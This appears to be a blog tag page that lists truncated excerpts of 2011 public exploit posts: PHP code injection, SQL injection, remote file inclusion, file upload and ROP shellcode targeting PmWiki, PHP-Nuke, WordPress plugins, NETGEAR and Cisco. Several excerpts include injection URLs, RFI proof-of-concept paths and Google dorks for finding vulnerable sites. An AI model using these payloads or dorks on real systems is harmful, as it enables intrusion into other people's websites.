AppUnix

Tag: exploit

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

23/11/2011 by little_oak

<?php /*     ————————————————————-     PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit     ————————————————————-          author……………: Egidio Romano aka EgiX     mail……………..: n0b0d13s[at]gmail[dot]com     software link……..: http://www.pmwiki.org/     affected versions….: from 2.0.0 to 2.2.34          +————————————————————————-+     | This proof of concept code was written for educational purpose only.    |     | Use it at your own risk. Author will be …


PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

23/11/2011 by little_oak

#!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, #               Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # …


WordPress jetpack plugin SQL Injection Vulnerability

23/11/2016 by little_oak

###################################################### # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability # Date: 2011-19-11 # Author: longrifle0x # software: WordPress # Download:http://wordpress.org/extend/plugins/jetpack/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in  jetpack, WordPress Plugin, vulnerability is SQL injection. File:wp-content/plugins/jetpack/modules/sharedaddy.php Exploit: id=-1; or 1=if *Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user=’None’ LIMIT 0,1)=’Y’) THEN 1 …


OSX universal ROP shellcode Tested on SNOW LEOPARD

03/10/2011 by little_oak

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don’t want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; – put your ‘normal’ shellcode in x64_shellcode.asm ; – make ; – ./sc ; ; if you want …


NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

23/09/2011 by little_oak

Sense of Security – Security Advisory – SOS-11-011 Release Date. 20-Sep-2011 Last Update. – Vendor Notification Date. 22-Mar-2011 Product. NETGEAR Wireless Cable Modem Gateway CG814WG Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others Severity Rating. High Impact. Authentication bypass, Cross Site Request Forgery Attack Vector. Remote without authentication Solution Status. Upgrade to R15 …


JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

23/09/2011 by little_oak

# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 Source: http://www.exploit-db.com/exploits/17882/


Multiple WordPress Plugin timthumb.php Vulnerabilities

23/09/2011 by little_oak

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) — Description — The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com …


Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 by little_oak

Sense of Security – Security Advisory – SOS-11-010 Release Date. 19-Sep-2011 Last Update. – Vendor Notification Date. 21-Feb-2011 Product. Cisco TelePresence Series Platform. Cisco Affected versions. C <= TC4.1.2, MXP


WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup …


WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { …

